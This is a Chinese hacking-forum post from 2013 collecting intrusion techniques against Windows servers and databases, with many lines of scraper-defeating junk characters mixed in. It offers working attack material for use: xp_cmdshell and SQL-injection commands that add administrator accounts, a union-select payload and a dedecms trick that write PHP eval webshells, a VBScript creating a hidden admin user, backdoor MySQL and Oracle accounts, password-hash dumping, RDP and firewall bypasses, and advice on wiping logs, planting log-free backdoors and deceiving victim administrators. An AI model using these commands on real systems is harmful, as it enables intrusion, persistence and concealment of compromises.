中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全
' D, i. G3 j% v# f1 v
1.net user administrator /passwordreq:no( x0 P3 K$ [2 \0 {
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了' z) j- f4 z- g
2.比较巧妙的建克隆号的步骤+ Q* n# j+ p0 B: [0 F
先建一个user的用户6 ?8 w; r6 T1 c
然后导出注册表。然后在计算机管理里删掉! L: C/ V# f" o$ c5 ]
在导入,在添加为管理员组) l( j( K9 t! r' Y$ c+ u
3.查radmin密码" l) ?- n& U; d! U: o
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg( N4 z! B3 e, O
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]2 V$ \# T2 z" U
建立一个"services.exe"的项/ M2 J5 a2 s' W) T3 y  M
再在其下面建立(字符串值)4 D% R% N9 T. k" y% J
键值为mu ma的全路径, L: Q0 f/ w* i3 G* W2 n
5.runas /user:guest cmd4 i6 D1 S/ [1 U5 w  s  \. b+ @
测试用户权限!6 S2 O' G' u5 J* @( @3 j6 v% n9 e
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?8 q9 O6 ~8 Q/ O# @  W; C$ e* V
7.入侵后漏洞修补、痕迹清理,后门置放:" r5 _3 P- `0 z2 g: W# r" Z- C
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
+ P: `2 k; l9 I! W8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
- \$ r+ Q  w' B* P+ r2 c3 N
9 x. f/ c+ G+ n' {0 i. @6 X2 A2 cfor example% t; A8 u& C& g' d/ f6 c1 L4 K" G

. G/ j- I: s6 T4 G! p, f) Y0 ~declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
& A* b- {% o  J4 m
* K9 a4 \  V' }, Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'6 L/ {. L8 r( S3 U
1 j. e) L' r9 x$ R* d& b
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
8 I9 b5 q& F) z/ _8 _如果要启用的话就必须把他加到高级用户模式
9 x0 A, `2 q! \3 h+ ?7 h0 r# d可以直接在注入点那里直接注入
0 A0 ~' q2 O& i; c+ Y; Wid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--3 Z2 G* {  H7 N3 t! X
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
% g7 E3 V! W6 w或者; e/ B3 ?! j$ Y. O
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
+ O2 Z& c9 v& q/ t- A来恢复cmdshell。! }+ h. v, M8 ]% I8 x* B% R! N( c- I
1 ?/ s. n3 |) `3 _# I
分析器
; D. ~7 y2 r# f' E( uEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--3 b2 V) j# x6 p0 D# @) K( Q
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
! `' m& F, [$ `! |; I3 b2 s. @. @10.xp_cmdshell新的恢复办法: x# E8 {9 o6 w4 F/ B0 `/ s
xp_cmdshell新的恢复办法$ p0 n1 T% T6 w7 N5 A
扩展储存过程被删除以后可以有很简单的办法恢复:
( b! G8 S3 [. v/ B0 ^( X! d删除
% R& d1 k. ^3 K4 Edrop procedure sp_addextendedproc
0 j# }8 `/ Z1 @  I; sdrop procedure sp_oacreate
6 R- }+ j# k: i' fexec sp_dropextendedproc 'xp_cmdshell'
6 w) N7 r  D8 N/ a- D9 Y  F% i# l! h- X, _) \5 m+ @+ c. Q2 S( P, H
恢复
$ U" b/ F# h* X8 ]' Z+ Z, S* y4 D4 g0 V# ~dbcc addextendedproc ("sp_oacreate","odsole70.dll")6 m3 `9 q/ @" o: d" F; u- _0 P
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
* j6 f. S0 ~* O' s/ d6 d
# v0 R, K+ ^" F( K, m这样可以直接恢复,不用去管sp_addextendedproc是不是存在. @# x* ^0 p' \

  O. b  k8 S$ Y0 F4 t-----------------------------
# G! g& H& H- f7 q( M7 Z9 b& k. {$ S/ d# u9 b( _9 r$ U( g
删除扩展存储过过程xp_cmdshell的语句:# u! G; L& V; k2 C& Y/ A; u/ p/ Q8 f
exec sp_dropextendedproc 'xp_cmdshell'
9 J+ b" J) d  h+ x7 G: Y& Z- ?4 J! P( S% [% L2 s  k' @
恢复cmdshell的sql语句
2 x( z; V6 v. n) W# M8 S8 Iexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'9 _( |* `8 N- b6 I/ e4 C5 _

7 D. y) v+ v0 w- w
: ]" c9 Q" _6 _* X开启cmdshell的sql语句/ q: l3 {* b/ k- `/ v
* ~7 N* i" U4 e5 V7 U$ q* [
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
% w. ?; e) I4 m! t* g' G& t( f8 c: v; S6 L& R
判断存储扩展是否存在1 ?3 D; p* f1 H0 e% ]8 p! F8 s8 c
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
: m4 B/ P% I+ K5 ?) B2 a1 g/ C返回结果为1就ok
1 @" H9 _! g0 a: E$ v0 X% _, m, V6 h- f" Y. h
恢复xp_cmdshell
. `0 ^# u& t7 U- A. @9 ]exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
6 e) y: w2 e) E) {$ N. r3 k' K返回结果为1就ok, r7 p9 I* Q- r$ y9 |
* e( C! u' y1 {0 n6 Z
否则上传xplog7.0.dll: V" x2 W% J+ e% ^
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
9 H+ R* y4 z" J6 X- b( w( L8 p5 v% w# Q
堵上cmdshell的sql语句
7 a, W: U- H) _5 d3 h$ `, bsp_dropextendedproc "xp_cmdshel2 D* t9 S& E# O6 R2 S( X
-------------------------. Q( f- `5 X. s) |3 D5 V5 u
清除3389的登录记录用一条系统自带的命令:
2 ^9 d8 u- z  D7 Zreg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
, t. o. v2 t) g9 J9 g4 m/ E( U; K; o/ O. q% s0 ]- S. O* \
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件2 D) {9 \: Q1 ^6 {1 F' ?3 Y
在 mysql里查看当前用户的权限
. G+ H! N' n) ]% zshow grants for  % H; f) n0 o4 L

9 i6 r' w+ m8 Q/ s  `  l% X以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
9 d: X2 `/ |. r' U$ g
" L9 c6 t* [9 \! z0 H4 \0 u3 ?7 B" x& c2 U. ~7 p0 Y7 r: f
Create USER 'itpro'@'%' IDENTIFIED BY '123';
0 C2 K% h( V5 j9 h' ~0 _+ g6 k9 n' Q. j2 L, G
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
9 @4 @7 c; t5 Y; R4 S2 A7 Q8 [3 ~3 k) k. |* o# ?. K
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
9 d0 y  y" \# G0 q: {
4 W' ~. M9 D5 n1 CMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
) k5 |3 P4 M# b5 z4 _1 T, C$ F1 Z# Q$ A+ T6 i5 b+ a; D( z4 H
搞完事记得删除脚印哟。- h2 q" P/ S0 k! ^$ y4 H
9 U8 P# [0 i' Q9 y; {
Drop USER 'itpro'@'%';
7 U! ]4 v) n8 f8 e$ r+ \  z( Z: h" b7 @2 j! {) k5 a
Drop DATABASE IF EXISTS `itpro` ;
  j& C9 X( B2 k
+ ]+ R6 l; k1 A6 _* p当前用户获取system权限- a! F9 I  }% R5 Y2 g1 H0 V/ y
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
% y$ a9 }/ H5 ^# vsc start SuperCMD+ X% z+ Y1 v& T1 v; L! ]
程序代码1 @' ?, j3 H4 z4 }( F% x) B& u4 ]& n: g
<SCRIPT LANGUAGE="VBScript">
" I, @3 c3 _7 }1 R$ K5 S  kset wsnetwork=CreateObject("WSCRIPT.NETWORK")4 t$ r' v8 j" d$ I
os="WinNT://"&wsnetwork.ComputerName! l% d5 Z: X8 r6 A
Set ob=GetObject(os)
, I2 q- n- W/ L; ASet oe=GetObject(os&"/Administrators,group")
/ Q& t) g/ z3 L8 Y9 |! tSet od=ob.Create("user","nosec")1 S9 W; F: A( @, U+ J- }
od.SetPassword "123456abc!@#"0 `5 c& ]) }1 t; H% e
od.SetInfo
5 Q8 z; N+ j0 sSet of=GetObject(os&"/nosec",user)
- Q0 H! u* A, m% Voe.add os&"/nosec"; L! R+ J) d* b* o, [, h, z- B% N
</Script>
* L/ O- _) Z+ }  D# X2 c! i+ q4 W<script language=javascript>window.close();</script>
' k& X# y, i2 f& y
  Y# k* Z3 M& N) |& {! p6 N) I7 [1 l# Q( v! H

: O7 E' z5 U0 p/ d' }9 M( s- V2 `/ r. G, N) M
突破验证码限制入后台拿shell
) z* d; w/ E) @! P! s程序代码
# a5 |9 @' r) X' |- f" `1 nREGEDIT4 ( ~0 Z$ k8 F2 f
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
  }  A7 d% \# J- m% r1 U: v"BlockXBM"=dword:000000007 L3 x4 J0 m! k. {: d5 x  Z

8 U0 q  `+ v2 q, Y保存为code.reg,导入注册表,重器IE
+ J. G1 o; K* p1 ^+ U: y就可以了# E1 g$ P: o3 O6 Y6 U# g8 o
union写马. i6 E+ L& X0 t! n! z
程序代码  ^) ]2 u. L# M6 {3 T
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*0 |3 B9 B; V+ V0 O. {: \
" _( r& b0 T1 p2 Z3 i6 b
应用在dedecms注射漏洞上,无后台写马
  W% \. S# i5 ededecms后台,无文件管理器,没有outfile权限的时候; K7 R9 D$ t3 s3 w/ m
在插件管理-病毒扫描里5 O' K$ V/ g0 I0 {1 {: T
写一句话进include/config_hand.php里5 h- t8 p* v/ c3 P& F/ R1 N
程序代码
7 m8 O" a  H2 }. }$ G) W- i>';?><?php @eval($_POST[cmd]);?>/ r4 r6 M% W' j4 `* U6 m
) b" o* I3 @* l( E
# A0 I5 t5 Z+ ~+ |. D  y+ Y2 D1 }
如上格式. x% X% _9 n/ m% b6 p; b
! X% q! t& y& F3 M% Y5 X
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
3 r5 }8 d9 P' J程序代码+ h5 T* Y! A5 D' h
select username,password from dba_users;
+ a8 r* ~3 n3 d, G+ |% o7 J  r5 B$ D* e* @  E) _5 _% v

- j1 d5 r6 q2 R/ wmysql远程连接用户
- _9 {) q4 z: s9 Q$ t% O; ^( O程序代码
4 B$ O+ W# ], Q9 X+ K; L
5 ^  R+ e( n( Y/ ^Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';, V/ I- g* c' W' r8 Y$ C9 v
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION/ L4 l! o5 C2 Z
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
. x8 C3 \  b$ S0 Q% i. e( p# d& ]MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
7 I! }. T( m1 \' G0 I& w+ O: p
# T" V7 n4 G% p! ~( K+ l5 I* c6 _& q' t% d/ H7 m5 o
' z% o& g% T. T9 U7 C

" D" ]' ]: e5 B( secho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0' q" B* U& [$ ~) M" M. [
& m6 s/ n) i' H( F1 h9 j3 a7 H8 e8 Q
1.查询终端端口  X" I' y3 G4 c  m( \, ^; Q
3 [! O0 C5 {' M! a) J! M' v
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2 U# ~+ U2 d3 f, x1 w
3 g1 c6 J3 \; q" o通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"; _* T, R2 X; B: p# Y  q0 [
type tsp.reg5 Q  f! F% z6 |" x8 a2 C
2 V* ~7 _4 P7 U. W
2.开启XP&2003终端服务+ B' ?* \! `6 C' d8 f3 z& i
/ {3 U8 N3 ~3 u5 H4 a

, t3 V8 N4 k4 K* [* ZREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f) |9 M, v6 `7 ^  \' I2 M7 L7 j

" y! P0 ]2 m0 o7 @: z- v1 o- z( R( m9 A6 V$ ]
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f9 ~6 ?0 M5 ~* B  L, ^
" Q3 H' @* c$ o  T1 T
3.更改终端端口为20008(0x4E28)
! f  u/ C# _; ~7 c5 @% X9 {4 }, b: `5 S# o
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
0 t8 h1 Z3 N+ W- a3 f( B- _
. q3 J/ b' c5 s- m3 LREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
5 t/ S+ ^9 f/ [5 w. o/ o: T* _0 F- M2 S) c1 v
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制5 V' p" U8 \4 s
, K; e, c4 h, t; g/ v
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
9 r' M+ o! H6 d9 Y! X/ I8 N9 M' L6 q4 F  \# [# N+ x9 _

9 U  g/ K8 i5 X  @5.开启Win2000的终端,端口为3389(需重启)
7 i. V4 y, t9 Y6 o, _7 d, T: W, N% z2 R6 t" {8 l0 M
echo Windows Registry Editor Version 5.00 >2000.reg + a* [  x, \6 U9 e# |/ X
echo. >>2000.reg
6 `4 _6 }. \  L) k& ]& secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 9 w% L! G9 K" E; t' u9 k) T
echo "Enabled"="0" >>2000.reg 8 F8 c6 F, V8 D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
9 [9 F# x3 C5 j2 ]3 f( l: j; ]echo "ShutdownWithoutLogon"="0" >>2000.reg
: R. I- E7 t2 O4 E8 a: @5 c  oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg ) Z3 Z  C3 t# g, f6 o
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
. ~+ k2 Q5 j3 X8 \# A  k" Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg , Q& S, A' b9 ?
echo "TSEnabled"=dword:00000001 >>2000.reg
+ Z/ x0 R4 V. C6 @6 qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
/ s0 N7 N  K& e! N' I$ yecho "Start"=dword:00000002 >>2000.reg
' X6 ^9 D1 ]% g- Z; [( f: L5 _& k. decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
3 b" p& @" l- O- d* R0 \/ g9 H6 hecho "Start"=dword:00000002 >>2000.reg 8 `! O( _9 W0 Z- l6 W8 I
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
0 r6 w" r/ C: q0 Zecho "Hotkey"="1" >>2000.reg : R- d, Y& k0 o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
  N& v' e1 u$ X( [echo "ortNumber"=dword:00000D3D >>2000.reg
$ v& F2 p7 a; g* Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg - p' G8 m# @5 b: {6 b& K7 \, x3 ~
echo "ortNumber"=dword:00000D3D >>2000.reg
  u+ d$ x$ V# Q' g/ j0 o6 ^. s6 p
# P' T* ^, B, Q" r6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
& ?1 {! N, V) v! e
. a$ f( p, Y8 \7 j2 h( Z% X' v@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
! N- T6 }, e# D(set inf=InstallHinfSection DefaultInstall)( d' [! _' F2 B
echo signature=$chicago$ >> restart.inf" R' C% |( o5 f1 ]1 j
echo [defaultinstall] >> restart.inf
, e$ g. b6 ]3 ^( O* }  jrundll32 setupapi,%inf% 1 %temp%\restart.inf! P( ^3 k% {( m% @' r
! H: G* ^* d; V2 `- Z+ m
0 ]4 B- c# f* \; `' b' x) \4 }+ m
7.禁用TCP/IP端口筛选 (需重启)
5 u) D" w+ v3 {( ~4 w6 v  t$ g
( F( z! \" p1 c. H! aREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
" |8 _: \3 x& Z3 e1 t7 p/ o4 L2 ?, o- e0 n' j' ]7 M
8.终端超出最大连接数时可用下面的命令来连接
. s# F1 I  Y0 A: U
2 ~! n9 y) K: S. i1 N' Nmstsc /v:ip:3389 /console: }* g$ C8 G; y( A( {+ s8 b$ Z
/ v; j, H% j1 G. ^7 Q& |
9.调整NTFS分区权限
6 a/ v) v! `4 F9 s9 C, A/ n' l1 d% P
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)( V$ y1 V: [  f& w$ H1 F2 {* W& n

/ v1 V  e' t3 L5 T* h+ {* Acacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)3 Q+ ~: X; k  J+ F+ F: q$ D
0 W6 H/ S+ K% q
------------------------------------------------------' }0 R8 U& x6 w* s8 D
3389.vbs
- B$ e3 T% z2 c& N# m& s5 ]" s; NOn Error Resume Next
7 f2 r7 a  b7 A7 ]* P# K4 M) ~- Nconst HKEY_LOCAL_MACHINE = &H80000002
9 ^% G" j1 e8 Z9 `8 w# W/ C) istrComputer = "."
2 I; y. [; y3 `Set StdOut = WScript.StdOut
7 r( `% j' q9 ]1 _Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_6 D6 |' F* |; t) F/ ?
strComputer & "\root\default:StdRegProv")% L$ V7 m! S3 p: y" f
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"2 P1 ?4 h: W) C4 E- m# d( G" _
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath) w; w1 _4 B" `; R" v, c6 i
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
6 v0 H& ?# S( q% Z2 ^oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
; l  K0 l: [% m7 d3 c$ b# v6 FstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
' |6 x3 K0 O* v- tstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
7 C5 _' `2 e% K8 B5 YstrValueName = "fDenyTSConnections"
& r0 J8 S% b3 ?' idwValue = 0
' t- `2 H' Y1 foreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
8 j. K) G7 l1 U5 a2 cstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"1 Z- l3 S0 l8 G) U0 w  w
strValueName = "ortNumber"
7 t; R" k6 G  p% ZdwValue = 3389% g/ S7 K+ x/ N% q6 G: E
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
0 a/ ?/ T4 l! q7 _4 _8 t, _. PstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
! ?* `: C# s9 n/ AstrValueName = "ortNumber"
- y+ F% M% u  J/ }" p4 K8 EdwValue = 3389
* m8 |3 h+ e7 K+ z0 L$ f7 ioreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
) j2 r' g1 Q4 _5 b% ]0 i! RSet R = CreateObject("WScript.Shell")
8 e& {. M9 A2 M! ER.run("Shutdown.exe -f -r -t 0")
) w, Z! d2 Z3 @4 D
* J% g, s5 U/ C: ~% C( C, R删除awgina.dll的注册表键值
+ {: L0 B0 ]/ B& J$ J+ B1 i0 h! ^程序代码
9 |2 N7 o1 f# t( a, P, J# L5 p2 j, M- k
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f3 x( R, V/ q. Y" x; A

4 t9 B/ v1 ?' o" K2 a& }2 f! z, V9 j* j! {- _. z* h
) F! n. I/ r) H* |8 f( ^% t+ ?) n. y
. X7 |% f" }. l7 N# m# @3 g
程序代码, r2 d5 U, P, X+ \
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
4 D2 ^: Q6 \1 t. B0 b
) h! z( A/ G2 S, D% `4 X设置为1,关闭LM Hash  F: g4 m. R' @3 C' s
! I4 e/ }  B- T$ X8 n" `+ d
数据库安全:入侵Oracle数据库常用操作命令+ x' N" d! A6 N8 m9 Z! h
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
% z9 L& u" ~. A; I# U: `/ }1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。1 ~! u4 b: T, |
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;1 z. k  q0 q% K6 @& ~9 N3 ?0 f- b
3、SQL>connect / as sysdba ;(as sysoper)或* Y9 B; v% v' n' d% i. [& H
connect internal/oracle AS SYSDBA ;(scott/tiger)! V! A: _/ B- L
conn sys/change_on_install as sysdba;. k. G8 {  x- n. ]) h1 w1 y
4、SQL>startup; 启动数据库实例
1 E7 F/ W$ _" P& {: H" H: ?& h; U5、查看当前的所有数据库: select * from v$database;
/ n3 \+ [$ P+ |: }/ c9 D3 k, t. o: mselect name from v$database;1 c3 M2 ~! _2 A& {
6、desc v$databases; 查看数据库结构字段
/ [5 w4 \# `, ~+ G" x: y7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:7 L# T" r) y/ L; c
SQL>select * from V_$PWFILE_USERS;- e7 b3 y5 s) K% U. M
Show user;查看当前数据库连接用户
( E! r1 P4 v- t- \. }: H8、进入test数据库:database test;" N4 W; D3 r/ @# k" w1 ]7 Q
9、查看所有的数据库实例:select * from v$instance;3 A  _* U3 U  G- a$ m1 K
如:ora9i
( D8 ~# [2 G9 O" U1 L( h* ?3 B5 G8 x10、查看当前库的所有数据表:
2 ^/ w3 S( H7 H7 e$ }$ D" z" ISQL> select TABLE_NAME from all_tables;
& a; Z7 J6 E; h3 lselect * from all_tables;+ B* F5 H: j' S0 {
SQL> select table_name from all_tables where table_name like '%u%';3 A* z0 Q6 J" i' w
TABLE_NAME% L- t' J5 D$ L% A+ e9 _
------------------------------
% F; H) Q* z) d% n& v5 c7 W! I* h8 v_default_auditing_options_2 I2 k" V" Q8 c. G! U
11、查看表结构:desc all_tables;/ A( X: w- j! o) a9 ^3 U8 C
12、显示CQI.T_BBS_XUSER的所有字段结构:$ l+ u7 K; e% F) M! z3 ^' S
desc CQI.T_BBS_XUSER;
/ t& s9 d9 f# q. c3 z13、获得CQI.T_BBS_XUSER表中的记录:
0 a' }' U1 R) C  O  [2 kselect * from CQI.T_BBS_XUSER;
/ B+ O. n' x+ \/ ?/ q14、增加数据库用户:(test11/test)
& a0 F; y% J2 M8 [4 `create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
, L6 L, ?( X( a3 [7 f; l15、用户授权:
8 N8 {+ d) m3 E- j7 R+ f# z' }  Kgrant connect,resource,dba to test11;7 U( s- M4 O& o+ _2 g( }) ~1 M
grant sysdba to test11;" P! Y% N, B. I. p& k
commit;6 i& K9 B0 O4 G$ g, }
16、更改数据库用户的密码:(将sys与system的密码改为test.)
9 Q1 [! Q$ Y" u/ w( I6 ^4 {alter user sys indentified by test;! T# Y" Z- P/ n0 c6 w9 O) ^
alter user system indentified by test;- n( w* N) X7 ?- H7 K# y9 ~

4 {: T+ D8 q  [+ sapplicationContext-util.xml/ ]; `' I  C1 k- e* y
applicationContext.xml
, ?6 Y5 V# b: x8 L1 q" wstruts-config.xml
- Y: B- |/ C, @9 p' lweb.xml
6 j- n  l. ]! D, w" t. u8 _server.xml
, O0 q% O$ G1 B4 a3 L: x2 N6 ktomcat-users.xml' F9 ?! |) c% _5 ?+ z
hibernate.cfg.xml% S' Q$ Z1 A$ P3 v" @6 s+ l* S, g
database_pool_config.xml5 I% W8 I/ \, H3 J( e# k

8 d7 j' _' o2 `
; [" z) X% \  t* c\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
/ `' d2 T" `( o' z  c0 l* U\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
# ?( l( Y. M+ a# K  r/ J\WEB-INF\struts-config.xml  文件目录结构
( `4 c2 o1 e# b) _4 f0 n9 y
4 X! r! o1 g' _" n( q3 |) V; Gspring.properties 里边包含hibernate.cfg.xml的名称
8 T: T( M5 c7 M' ^/ k7 K# g& |% T- X! U& u. h& ^0 ]
# Q4 K+ r2 Q) S2 z6 S. i# P
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
5 X# k2 a4 r. z4 Z) O, G! N" K
: ?: R5 V3 G8 w; U如果都找不到  那就看看class文件吧。。
9 ?8 q* \+ X$ {0 p5 f! |6 a
) A9 [0 \4 `; Q5 I测试1:
0 x, l. V1 Z1 kSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
) ~9 Y5 \. B' d$ {3 A! l9 f  r. [3 U& j2 \/ a  w
测试2:+ w3 f* S6 n7 a6 G- I8 \$ L
+ F* T( @/ j/ @2 f( `* B% }* ]8 r/ G
create table dirs(paths varchar(100),paths1 varchar(100), id int)
. b- y. G! d) ]2 j( L2 Z  `+ u& x2 e; P
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--5 C+ N' F% j  X

7 x. c9 B3 {' s, R+ ^" xSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
/ [9 |, [# `2 N" d3 d/ r$ L. K# V* J
查看虚拟机中的共享文件:8 z" ?+ c7 M5 P/ p6 o
在虚拟机中的cmd中执行/ W2 g4 @% A: G# e$ ^6 Z
\\.host\Shared Folders
! A( B% S! P( A, \5 a5 p2 c0 C: j& {  c# P, w6 ~
cmdshell下找终端的技巧/ _* m2 y, H: P  |1 W6 N4 k) u
找终端:
' Z* k% K/ l/ k% F0 L; \第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 5 C: b  V0 z1 s7 K
   而终端所对应的服务名为:TermService & x1 y4 U# G0 V! ^8 ?
第二步:用netstat -ano命令,列出所有端口对应的PID值!
' E8 D( o, z, n' l   找到PID值所对应的端口; E7 Y& @0 g  G% u1 P
- f8 Z0 m% J$ g  E1 u% H4 f3 Y
